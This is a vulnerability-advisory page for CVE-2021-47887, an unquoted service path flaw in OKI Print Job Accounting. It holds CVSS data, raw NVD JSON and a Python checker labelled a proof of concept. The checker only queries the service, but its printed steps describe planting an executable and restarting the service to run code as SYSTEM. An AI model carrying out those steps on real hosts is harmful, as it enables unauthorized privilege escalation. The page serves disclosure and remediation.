Security Vulnerability Report
CVE-2021-47887 CVSS 7.8 HIGH

CVE-2021-47887

Published: 2026-01-21 18:16:23
Last Modified: 2026-04-15 00:35:42

Description

OKI Print Job Accounting 4.4.10 contains an unquoted service path vulnerability in the OkiJaSvc service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Okidata\Print Job Accounting\' to inject malicious executables and escalate privileges.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

OKI Print Job Accounting 4.4.10 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
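#!/usr/bin/env python3
"""
CVE-2021-47887 PoC - OKI Print Job Accounting Unquoted Service Path

This PoC demonstrates the unquoted service path vulnerability in OkiJaSvc service.
It only queries the service configuration and prints its findings; it does not
write any file and does not stop or start the service.

Author: Security Researcher
Reference: https://www.vulncheck.com/advisories/print-job-accounting-okijasvc-unquoted-service-path
"""

import os
import sys
import subprocess
import shutil


def is_unquoted_service_path(binary_path):
    """Return True if a service image path is unquoted and contains a space.

    Args:
        binary_path: The value part of a BINARY_PATH_NAME line, possibly
            followed by command-line arguments.

    Returns:
        True when the path does not start with a double quote and the portion
        up to and including the first ".exe" contains a space (the CWE-428
        condition). False for empty, quoted, or space-free image paths.
    """
    value = binary_path.strip()
    if not value or value.startswith('"'):
        return False
    # Only the image path matters; spaces inside trailing arguments are harmless.
    exe_end = value.lower().find('.exe')
    image = value if exe_end == -1 else value[:exe_end + len('.exe')]
    return ' ' in image


def check_service_path():
    """Report whether OkiJaSvc is configured with an unquoted, space-containing path.

    Runs ``sc qc OkiJaSvc`` and inspects the first BINARY_PATH_NAME line.

    Returns:
        True only when the service is found and its image path is unquoted and
        contains a space. False when the service is missing, the query fails,
        or the path is already quoted (for example after remediation).
    """
    try:
        result = subprocess.run(
            ['sc', 'qc', 'OkiJaSvc'],
            capture_output=True,
            text=True
        )
    except (OSError, ValueError) as e:
        # OSError: sc is unavailable; ValueError: output could not be decoded.
        print(f"[-] Error checking service: {e}")
        return False

    for line in result.stdout.splitlines():
        if 'BINARY_PATH_NAME' not in line:
            continue
        print("[+] OkiJaSvc service found")
        print(f"[+] Current path: {line.strip()}")
        # The first colon separates the field name from the value; the drive
        # letter's colon stays in the value.
        _, _, binary_path = line.partition(':')
        if is_unquoted_service_path(binary_path):
            print("[!] Service path is unquoted and contains spaces (CWE-428)")
            return True
        print("[+] Service path is quoted or has no spaces; not affected as configured")
        return False
    return False


def create_malicious_executable():
    """Report the intermediate path that an unquoted service path would resolve to.

    Despite its name, this function creates nothing: it prints the location
    and returns it.

    Returns:
        The path of the first intermediate candidate under the Okidata directory.
    """
    # Print.exe in the intermediate directory is the candidate Windows tries
    # before the real service binary.
    malicious_path = r'C:\Program Files\Okidata\Print.exe'

    # NOTE(review): planting a file here requires write access to
    # C:\Program Files\Okidata\, which standard users do not have under default
    # ACLs. Real-world exposure therefore depends on the directory permissions
    # of the affected host; audit them alongside the service path.
    # NOTE(review): the SYSTEM claim below assumes the service runs as
    # LocalSystem; confirm with SERVICE_START_NAME in the `sc qc` output.
    print(f"[*] Malicious executable would be placed at: {malicious_path}")
    print("[*] When OkiJaSvc restarts, it will execute this file with SYSTEM privileges")

    return malicious_path


def exploit():
    """Describe the issue for the local OkiJaSvc service and how to remediate it.

    Returns:
        True when the service was found with an unquoted path and the
        explanation was printed, False otherwise.
    """
    print("=" * 60)
    print("CVE-2021-47887 - OKI Print Job Accounting Unquoted Service Path")
    print("=" * 60)

    if not check_service_path():
        print("[-] OkiJaSvc service not found, not accessible, or its path is already quoted")
        return False

    print("\n[*] Vulnerability: Service path contains spaces without quotes")
    print("[*] Vulnerable path: C:\\Program Files\\Okidata\\Print Job Accounting\\")
    print("[*] Windows will search for: C:\\Program.exe, C:\\Program Files\\Okidata\\Print.exe")

    create_malicious_executable()

    print("\n[*] Attack steps:")
    print("    1. Create malicious executable at C:\\Program Files\\Okidata\\Print.exe")
    print("    2. Wait for service restart or trigger manually: sc stop OkiJaSvc && sc start OkiJaSvc")
    print("    3. Malicious code executes with SYSTEM privileges")

    print("\n[*] Mitigation:")
    print("    1. Wrap the service's ImagePath in double quotes")
    print("    2. Keep C:\\ and C:\\Program Files\\Okidata\\ writable by administrators only")

    return True


if __name__ == '__main__':
    if os.name != 'nt':
        print("[-] This exploit only works on Windows systems")
        sys.exit(1)

    exploit()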

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47887", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:23.207", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OKI Print Job Accounting 4.4.10 contains an unquoted service path vulnerability in the OkiJaSvc service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files\\Okidata\\Print Job Accounting\\' to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "OKI Print Job Accounting 4.4.10 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio OkiJaSvc que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files\\Okidata\\Print Job Accounting\\' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://web.archive.org/web/20211207181409/https://www.oki.com/me/printing/services-and-solutions/smart-solutions/print-job-accounting/index.html", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49623", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/print-job-accounting-okijasvc-unquoted-service-path", "source": "[email protected]"}]}}